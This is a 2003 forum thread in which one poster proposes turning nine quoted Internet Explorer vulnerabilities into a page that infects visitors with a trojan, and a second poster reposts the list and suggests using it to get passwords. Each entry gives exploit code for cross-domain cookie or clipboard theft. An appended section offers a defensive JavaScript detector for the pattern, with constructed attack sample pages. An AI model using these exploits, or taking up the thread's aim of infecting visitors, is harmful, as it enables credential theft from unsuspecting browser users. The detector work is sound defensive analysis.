raptor
Oct 24 2003, 10:23 PM
I've read about these 9 known IE vulns and I wonder if we could all work together to make them work for us, and if we can make an HTML page that will infect visitors with a trojan...
------------------------------
| QUOTE |
showModalDialogCache: var fVuln=oWin.showModalDialog; Exploit - IE 5.5: fVuln("javascript:alert(dialogArguments.document.cookie)",oWin,""); Exploit - IE 6: Not trivial but possible, by using our old "analyze.dlg" vulnerability. Impact: Full access in IE5.5, "My Computer" zone access in IE6.
externalCache: var oVuln=oWin.external; Exploit: oVuln.NavigateAndFind("javascript:alert(document.cookie)","",""); Impact: Full access.
createRangeCache: var fVuln=oWin.document.selection.createRange; Exploit: fVuln().pasteHTML("<img src=\"javascript:alert(document.cookie)\">"); Impact: Full access.
elementFromPointCache: var fVuln=oWin.document.elementFromPoint; Exploit: alert(fVuln(1,1).document.cookie); Impact: Full access.
getElementByIdCache: var fVuln=oWin.document.getElementById; Exploit: alert(fVuln("ElementIdInNewDoc").document.cookie); Impact: Full access.
getElementsByNameCache: var fVuln=oWin.document.getElementsByName; Exploit: alert(fVuln("ElementNameInNewDoc")[0].document.cookie); Impact: Full access.
getElementsByTagNameCache: var fVuln=oWin.document.getElementsByTagName; Exploit: alert(fVuln("BODY")[0].document.cookie); Impact: Full access.
execCommandCache: var fVuln=oWin.document.execCommand; Exploit: fVuln("SelectAll"); fVuln("Copy"); alert(clipboardData.getData("text")); Impact: Read access to the loaded document.
clipboardDataCache: var oVuln=oWin.clipboardData; Exploit: alert(oVuln.getData("text")); or oVuln.setData("text","data"); Impact: Read/write access to the clipboard, regardless of settings. |
Yorn
Oct 25 2003, 01:31 AM
For easier reading:
| CODE |
showModalDialogCache: var fVuln=oWin.showModalDialog; Exploit - IE 5.5: fVuln("javascript:alert(dialogArguments.document.cookie)",oWin,""); Exploit - IE 6: Not trivial but possible, by using our old "analyze.dlg" vulnerability. Impact: Full access in IE5.5, "My Computer" zone access in IE6.
externalCache: var oVuln=oWin.external; Exploit: oVuln.NavigateAndFind("javascript:alert(document.cookie)","",""); Impact: Full access.
createRangeCache: var fVuln=oWin.document.selection.createRange; Exploit: fVuln().pasteHTML("<img src=\"javascript:alert(document.cookie)\">"); Impact: Full access.
elementFromPointCache: var fVuln=oWin.document.elementFromPoint; Exploit: alert(fVuln(1,1).document.cookie); Impact: Full access.
getElementByIdCache: var fVuln=oWin.document.getElementById; Exploit: alert(fVuln("ElementIdInNewDoc").document.cookie); Impact: Full access.
getElementsByNameCache: var fVuln=oWin.document.getElementsByName; Exploit: alert(fVuln("ElementNameInNewDoc")[0].document.cookie); Impact: Full access.
getElementsByTagNameCache: var fVuln=oWin.document.getElementsByTagName; Exploit: alert(fVuln("BODY")[0].document.cookie); Impact: Full access.
execCommandCache: var fVuln=oWin.document.execCommand; Exploit: fVuln("SelectAll"); fVuln("Copy"); alert(clipboardData.getData("text")); Impact: Read access to the loaded document.
clipboardDataCache: var oVuln=oWin.clipboardData; Exploit: alert(oVuln.getData("text")); or oVuln.setData("text","data"); Impact: Read/write access to the clipboard, regardless of settings. |
Note: These look like XSS vulnerabilities, so you could get passwords with them, but you won't be executing any files on their machine.
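All nine entries share one pattern, which the "...Cache" names refer to: a method or object is read off a window the attacker's page controls (oWin), that window is then navigated to another domain, and the stored reference is invoked afterwards so it acts on the new, cross-domain document. The block below is an added example, not code from the thread or from the original advisory: a small static detector that scans a page's inline scripts for exactly that sequence (window opened, reference to one of the nine targets stored without being called, window navigated, stored reference used later). The attack flow it assumes (open, cache, navigate, call) is my reading of the snippets above; the three sample pages are constructed for the example, and target.example is a placeholder host.

```javascript
// Added example (not from the thread): static detector for the "cached
// reference" pattern behind the nine IE advisories quoted above.
// Assumed attack flow: attacker page opens a window it controls (oWin),
// stores a method/object from it, navigates that window to another domain,
// then calls the stored reference against the new document. Run with node.

// Property paths named in the advisory, relative to the window reference.
const CACHED_TARGETS = new Set([
  "showModalDialog",
  "external",
  "document.selection.createRange",
  "document.elementFromPoint",
  "document.getElementById",
  "document.getElementsByName",
  "document.getElementsByTagName",
  "document.execCommand",
  "clipboardData",
]);

// Blank out string literals and remove comments in one pass, so a "//" inside a
// URL string is not treated as a comment and commented-out code is ignored.
function stripNoise(js) {
  return js.replace(
    /("(?:[^"\\\n]|\\.)*"|'(?:[^'\\\n]|\\.)*')|\/\*[\s\S]*?\*\/|\/\/[^\n]*/g,
    (m, str) => (str ? '""' : "")
  );
}

// Concatenate the bodies of inline <script> blocks (attribute handlers ignored).
function extractScripts(html) {
  const out = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out.join("\n");
}

// Variables holding a window the script controls:  x = window.open(...) / open(...)
function windowVariables(js) {
  const names = new Set();
  const re = /\b(\w+)\s*=\s*(?:window\.)?open\s*\(/g;
  let m;
  while ((m = re.exec(js)) !== null) names.add(m[1]);
  return names;
}

// Is the window variable navigated anywhere after offset `from`?
function navigatesAfter(js, win, from) {
  const re = new RegExp(
    "\\b" + win + "\\.(?:location(?:\\.href)?\\s*=[^=]|location\\.(?:replace|assign)\\s*\\(|navigate\\s*\\()",
    "g");
  re.lastIndex = from;
  return re.test(js);
}

// Is the stored reference called or dereferenced after offset `from`?
function usedAfter(js, name, from) {
  const re = new RegExp("\\b" + name + "\\s*(?:\\(|\\.|\\[)", "g");
  re.lastIndex = from;
  return re.test(js);
}

// Report every  name = win.path  where path is one of the nine targets and is
// stored rather than called; "high" when the window is navigated afterwards
// and the stored reference is used after that point.
function findCachedReferences(html) {
  const js = stripNoise(extractScripts(html));
  const wins = windowVariables(js);
  const findings = [];
  const re = /\b(\w+)\s*=\s*(\w+)\.([\w.]+)(?![\w.]|\s*\()/g;
  let m;
  while ((m = re.exec(js)) !== null) {
    const [, name, win, path] = m;
    if (!wins.has(win) || !CACHED_TARGETS.has(path)) continue;
    const after = m.index + m[0].length;
    const navigated = navigatesAfter(js, win, after);
    const used = usedAfter(js, name, after);
    findings.push({ variable: name, window: win, path, navigated, used,
                    severity: navigated && used ? "high" : "low" });
  }
  return findings;
}

// Constructed sample: the assumed flow, using the getElementById primitive.
const ATTACK_PAGE = `<html><body><script>
var oWin = window.open("about:blank", "w");
var fVuln = oWin.document.getElementById;   // stored before navigation
oWin.location = "http://target.example/";   // window now shows another domain
setTimeout(function () { alert(fVuln("ElementIdInNewDoc").document.cookie); }, 3000);
</script></body></html>`;

// Constructed sample: the external object, navigated via window.navigate().
const EXTERNAL_PAGE = `<html><body><script>
var oWin = open("about:blank", "w");
var oVuln = oWin.external;
oWin.navigate("http://target.example/");
setTimeout(function () { oVuln.NavigateAndFind("javascript:alert(document.cookie)", "", ""); }, 3000);
</script></body></html>`;

// Constructed benign sample: same method, but called directly on the live
// window with nothing stored across a navigation.
const BENIGN_PAGE = `<html><body><script>
var oWin = window.open("help.html", "w");
oWin.document.getElementById("note").innerText = "hi";
</script></body></html>`;

console.log(JSON.stringify(findCachedReferences(ATTACK_PAGE), null, 2));
```

The detector is deliberately narrow: it only trusts a window reference that the same script created with open(), and only escalates to "high" when both the navigation and the later use are visible in the same inline scripts. A page that splits those steps across frames or external scripts would come back as "low", so treat a "low" finding on one of the nine paths as worth a manual look rather than a clean result.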